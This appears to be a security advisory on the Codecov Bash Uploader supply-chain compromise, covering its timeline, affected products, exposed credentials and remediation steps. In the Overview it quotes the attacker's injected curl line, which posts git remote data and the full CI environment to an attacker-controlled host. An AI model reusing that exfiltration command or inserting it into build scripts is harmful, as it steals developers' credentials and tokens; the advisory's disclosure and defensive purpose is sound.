Executive Summary

On April 15, Codecov announced a compromise to its Bash Uploader (a software application used in some of its products), whereby a threat actor was able to send sensitive information from the affected environment to a server they controlled. It appears the threat actor had access to the environment from about January 31 to April 1 before Codecov learned of the compromise. Since that time, the company has taken steps to secure and remediate the affected program, begun an investigation to assess the impact, and reported the incident
to law enforcement.

The compromised software allowed the attacker to steal any credentials, authentication tokens, or keys that victims were passing through their continuous integration (CI) environment when the Bash Uploader program was executed. The compromise’s full impact may be seen in the coming months when cybercriminals begin to use stolen credentials to attack and steal sensitive information from affected companies.

Like the SolarWinds incident, which affected about 18,000 customers, including private organizations and the federal government, this compromise is one of the latest supply chain attacks. It also resembles a compromise from 2020 when hackers breached Git analytics provider Waydev to steal its customers’ GitHub and GitLab OAuth tokens to access their internal networks and steal sensitive information.

Codecov has about 29,000 clients, including companies like Atlassian, Procter & Gamble, GoDaddy, the Washington Post, Royal Bank of Canada, Tile, Dollar Shave Club, Mozilla, Webflow, Palo Alto Networks, and IBM.

Overview

The threat actor leveraged an error in Codecov’s Docker image creation process to steal the credential required to modify the Bash Uploader program.

Since the end of January, the threat actor made periodic, unauthorized alterations to the Bash Uploader program, which enabled them to steal and send information stored in the users’ CI environments to a third-party server they controlled.

Apparently, the threat actor added the following code to the program:

curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)”
http://ATTACKER_IP/upload/v2 || true

where ATTACKER_IP = 104.248.94[.]23¹

Because the compromised Codecov Bash Uploader program is embedded in other products, it is believed that many of the company’s customers are likely affected. Some affected products include:

• Codecov-actions uploader for GitHub

• Codecov CircleCI Orb

• Codecov Bitrise Step

According to the company, the compromised Bash Uploader script software could potentially affect:

• Any credentials, tokens, or keys that Codecov’s customers were passing through their CI
  runner that would be accessible when the Bash Uploader program was executed.

• Any services, datastores, and application code that could be accessed with these credentials,
  tokens, or keys.

• The git remote information (URL of the origin repository) of repositories using the Bash
  Uploaders to upload coverage to Codecov in CI.

It appears a customer discovered the software compromise when they noticed the program hash (a software digital fingerprint to confirm the program integrity) did not match that of the software version.

Risk Mitigation

Codecov customers who used any of the affected tools are advised to change any credentials they sent to Codecov’s platforms during the affected period. Codecov strongly recommends that affected users immediately re-roll all their credentials, tokens, or keys located in the environment variables in their CI processes that used one of Codecov’s Bash Uploaders.

The company says that clients can determine the keys and tokens they used in the CI environment by running the env command in their CI pipeline and, if anything returned from that command is considered private or sensitive, it strongly recommends invalidating the credential and generating a new one. Additionally, Codecov recommends clients audit the use of those tokens in their networks.

The company said it emailed affected users on April 15 using their email addresses on file from GitHub GitLab Bitbucket, and users will see a notification banner after they log into Codecov.

Additionally, customers using a local version of the affected program should check if the attacker’s code is present. If it is, they should replace the program from https://codecov.io/bash.

As a lesson learned, clients should compare the digital fingerprint hash value of the software against the hash value of the downloaded software.

Please find more information in the Codecov advisory: https://about.codecov.io/security-update/

¹ Popular Codecov code coverage tool hacked to steal dev credentials (bleepingcomputer.com)